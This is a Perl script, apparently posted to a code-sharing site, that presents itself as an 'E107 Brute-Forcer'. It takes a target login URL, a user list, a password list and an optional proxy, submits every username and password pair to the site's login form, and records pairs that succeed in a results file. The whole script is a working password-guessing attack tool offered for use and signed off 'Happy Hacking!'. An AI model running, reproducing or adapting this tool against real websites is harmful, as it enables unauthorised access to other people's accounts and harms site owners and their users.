Juno

1. #!/usr/bin/perl
2. #Thanks also to IBM for helping to create this - Bret Swedeen especially
3. #NBTDOTM
4. use HTML::Parser;
5. use WWW::Mechanize;
6. use HTTP::Cookies;
7. use Test::More no_plan;
8.  
9.  
10. my $NumArgs = $#ARGV + 1;#Determine the number of arguments the user has given us
11. if ($NumArgs <= 2) {
12.     #Our user has only entered some information. Display help screen.
13.     header();
14.     exit();}
15. if (($NumArgs == 3) or ($NumArgs == 4)){   
16.     my $url = $ARGV[0]; #Host is the first argument supplied
17.     my $userloc = $ARGV[1]; #Username is the 2nd argument supplied
18.     my $passloc = $ARGV[2]; #Passlist location is 3rd argument 
19.     my $proxyloc = $ARGV[3]; #Location of the proxy
20.     #Display header
21. print qq{
22. ----------------------------------------------------------------------
23.                   E107 Brute-Forcer          
24.                 Custom Built by Juno             
25.                               NBTDOTM                                
26. ----------------------------------------------------------------------
27. };
28. print "\nYour host is: $url";
29. print "\nYour userlist is: $userloc";
30. print "\nYour password list is: $passloc";
31. goto NoProxy if $proxyloc eq '';
32. print "\nYour proxy is: http://$proxyloc";
33.  
34. NoProxy: print "\n\nThe program will now try bruteforcing the host you selected.";
35. print "\nPress ENTER to begin, or Control-C to quit.";
36. my $useless = <STDIN>; #Last chance for user to abort attack
37. print "\nNBTDOTM\n-------------------------\n";
38. print "\nCreating temp directory to store results in... ";
39. mkdir('temp', 0777) || print $!;
40. print "Done.";
41. #Use userlist
42. open USERLIST, $userloc or die$!;
43. my @users = USERLIST;
44. while (my $user = <USERLIST>) {
45.     chomp($user);
46.     print "\nCreating new directory for new user $user... ";
47.     mkdir('temp' . '\\' . $user, 0777) || print $!;
48.     print "Done.";
49.         #Use passlist
50.         open PASSLIST, $passloc or die $!;
51.         my @lines = PASSLIST;
52.         while (my $password = <PASSLIST>) {
53.             chomp($password);
54.             print "\nTrying USER $user PASSWORD $password... ";
55.             my $outfile = 'temp' . '\\' . $user . '\\' . $password . ".htm";
56.             my $mech = WWW::Mechanize->new(autocheck => 1);
57.             $mech->stack_depth($max_depth => 0); #Set maxd to 0 if running out of memory;
58.             $mech->timeout(60);
59.             $mech->cookie_jar(HTTP::Cookies->new());
60.             #Set proxy if specified
61.             goto GETPAGE if $proxyloc eq '';
62.             $mech->proxy(['http'], 'http://' . $proxyloc);
63.            
64.            
65.             GETPAGE: $mech->get('http://' . $url);
66.             my $test = $mech->success;
67.             if ($@) {
68.                 goto GETPAGE; #Error trapping
69.                 }
70.             print "$test";
71.             $mech->field(username => "$user");
72.             $mech->field(userpass => "$password");
73.             $mech->click();
74.             my $output_page = $mech->content();
75.             open(OUTFILE, ">$outfile");
76.             print OUTFILE "$output_page";
77.             close(OUTFILE);
78.             my $filesize = -s $outfile;
79.             #Search file for 'incorrect','invalid', or 'wrong'; if not found, we have success!
80.                 if ($output_page =~ /(incorrect|invalid|wrong)/i) {
81.                     print "Wrong Passsword";
82.                     } else {
83.                     print "SUCCESS";
84.                     my $successloc = 'Results.txt';
85.                     open(SUCCESS, ">>$successloc");
86.                     print SUCCESS "Successful login with USERNAME: $user PASSWORD: $password\n";
87.                     close(SUCCESS);
88.                 }
89.                 #Output current progress to Progress.txt in case of crash
90.                 open(PROGRESS, ">Progress.txt");
91.                 print PROGRESS "E107 Brute force progress\n----------------------\nLast User Tried: $user\nLast Password Tried: $password\n";
92.                 close(PROGRESS);
93.             #Delete password file after analysis[Comment out if you want to keep]
94.             my $delfile = 'temp' . '\\' . $user . '\\' . $password . ".htm";
95.             unlink($delfile);
96.         print ".";
97.         }
98.     #Delete username directory
99.     rmdir('temp' . '\\' . $user);
100.         }
101. #Delete temp directory
102. rmdir('temp');
103. }
104. print "\n\nAttack complete!\nResults will be located in Results.txt.";
105. my $resultsloc = 'Results.txt';
106. open(RESULTS, ">>$resultsloc");
107. print RESULTS "----------------\nAttack Complete\n----------------\n";
108. close(RESULTS);
109. exit();
110. sub header{
111. print qq{
112. ----------------------------------------------------------------------
113.                   E107 Brute-Forcer          
114.                 Custom Built by Juno             
115.                               NBTDOTM                                
116. ----------------------------------------------------------------------
117. Usage: E107Brute [target site] [userlist] [passlist] (proxy)
118.  
119. Example: E107Brute somesite.com/login.php users.txt passwords.txt 192.
120. 168.1.1:80
121.  
122. The program will attempt a bruteforce on the usernames specified using
123. the password list that was supplied. No switches(-) are needed for the
124. arguments.  Remember to specifiy the full URL to the login page.  The
125. proxy argument is optional; just omit if you don't need it. Results can
126. be found in the folder that this tool is run under in 'Results.txt'.
127. Happy Hacking!
128. };
129. }